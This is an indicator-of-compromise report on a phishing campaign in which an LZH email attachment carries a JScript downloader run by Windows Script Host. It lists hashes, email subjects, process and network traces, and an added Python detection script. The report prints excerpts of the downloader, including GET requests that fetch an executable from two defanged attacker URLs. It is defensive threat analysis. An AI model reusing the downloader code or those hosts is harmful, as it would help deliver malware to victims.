- #IOC #OptiData #VR #? #lzh #js #WSH
- https://pastebin.com/MP3kCSSh
- https://radetskiy.wordpress.com/?s=WSH
- scheme
- --------------
- email attachment (lzh) > js > wsh > GET from one of 2 URLs > %templates%\random.exe
- email_headers
- --------------
- n/a
- email_subjects
- --------------
- "рахунки ТОВ Заря. оплатить до конца недели" (translation: "invoices of LLC Zarya. pay by the end of the week")
- "Рахунки Богданова за 10е" (translation: "Bogdanov's invoices for the 10th")
- files
- --------------
- SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
- File name Рахунки до оплати ТОВ СМБ.lzh (translation: "Invoices to pay LLC SMB.lzh") LHarc 1.x/ARX archive data [lh0]
- File size 86.76 KB
- SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
- File name QoC5kb2N4?= [CLEAN]
- File size 5.73 KB
- SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
- File name Pax. 00295 10.10.2018p.xls.js
- File size 80.94 KB
- SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
- File name 82371Equipmentthe > served as [dwrite.exe], PE executable (!This program cannot be run in DOS mode)
- File size 428 KB
- script (excerpts from the .js downloader; URLs defanged with {.})
- --------------
- var wsh = new ActiveXObject("wscript.shell"); // WScript.Shell COM object
- var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe"; // %APPDATA%\Microsoft\Windows\Templates\<4-7 digit number>.exe; "|0" truncates the whole sum, so the number is in 9999..1009997
- HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send(); // first download URL
- else
- { HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false); // fallback: second download URL, same path and file name
- activity
- **************
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
- "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"
- netwrk
- --------------
- 93.179.68.94 sfbotvinnik{.} icu GET /folua/dwrite.exe HTTP/1.1 Mozilla/4.0
- comp
- --------------
- wscript.exe 2204 93.179.68.94 80 ESTABLISHED
- persist
- --------------
- n/a
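Detection logic for the chain above (wscript.exe started on a double-extension .js, outbound HTTP from the script host, a numerically named .exe started from the Templates folder), as an added example that is not part of the original paste. The sample events are constructed from the proc/netwrk/comp lines; the parent-process field is an assumption, since the paste records processes and connections but not process lineage.

```python
"""Rules for the WSH downloader chain: .xls.js -> wscript.exe -> HTTP GET -> %templates%\\<number>.exe"""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Stage 1: a document-looking extension directly followed by a WSH script
# extension at the end of the command line (closing quote optional).
DOUBLE_EXT = re.compile(
    r'\.(?:xls|xlsx|doc|docx|pdf|rtf|txt)\.(?:js|jse|vbs|vbe|wsf)"?\s*$', re.I)

# Stage 3: the dropper builds the payload name as (Math.random()*999999)+9999|0.
# The bitwise OR applies to the whole sum, so the name is an integer in
# [9999, 1009997], i.e. 4 to 7 decimal digits. Observed instance: 658656.exe.
TEMPLATES_EXE = re.compile(
    r'\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\d{4,7}\.exe$', re.I)


def payload_name_range():
    """Integer range the dropper's file-name expression can produce (inclusive)."""
    low = int(0 * 999999 + 9999)                 # Math.random() == 0
    high = int((999999 - 1e-9) + 9999)           # Math.random() just below 1, truncated by |0
    return low, high


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, object]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    hits: List[str] = []
    image = str(ev.get("image", ""))
    img = image_name(image)
    if ev.get("type") == "process":
        if img in SCRIPT_HOSTS and DOUBLE_EXT.search(str(ev.get("cmdline", ""))):
            hits.append("wsh_double_extension_script")
        if TEMPLATES_EXE.search(image):
            hits.append("templates_random_exe")
        # Lineage rule: a script host spawning any .exe (parent field is assumed telemetry).
        if image_name(str(ev.get("parent", ""))) in SCRIPT_HOSTS and img.endswith(".exe"):
            hits.append("wsh_spawned_exe")
    elif ev.get("type") == "network":
        if img in SCRIPT_HOSTS and ev.get("dest_port") in (80, 443):
            hits.append("wsh_outbound_http")
    return hits


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map event index -> matched rules for every event that fires at least one rule."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry modelled on the proc/netwrk/comp lines of the paste.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"type": "process", "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"',
     "parent": r"C:\Windows\explorer.exe"},                       # parent: assumption
    {"type": "network", "image": r"C:\Windows\System32\WScript.exe",
     "dest_ip": "93.179.68.94", "dest_port": 80},
    {"type": "process",
     "image": r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe",
     "cmdline": r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe",
     "parent": r"C:\Windows\System32\WScript.exe"},               # parent: assumption
    # Benign control: an admin script with a single .js extension, started from cmd.exe.
    {"type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe "C:\Scripts\inventory.js"',
     "parent": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules)
```

The Templates rule is deliberately narrow (numeric name under the Roaming Templates folder) so it stays quiet on normal hosts; the double-extension and script-host-network rules are the ones that would also catch the next campaign using a different drop folder.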
- # # #
- https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
- https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
- https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
- https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
- https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc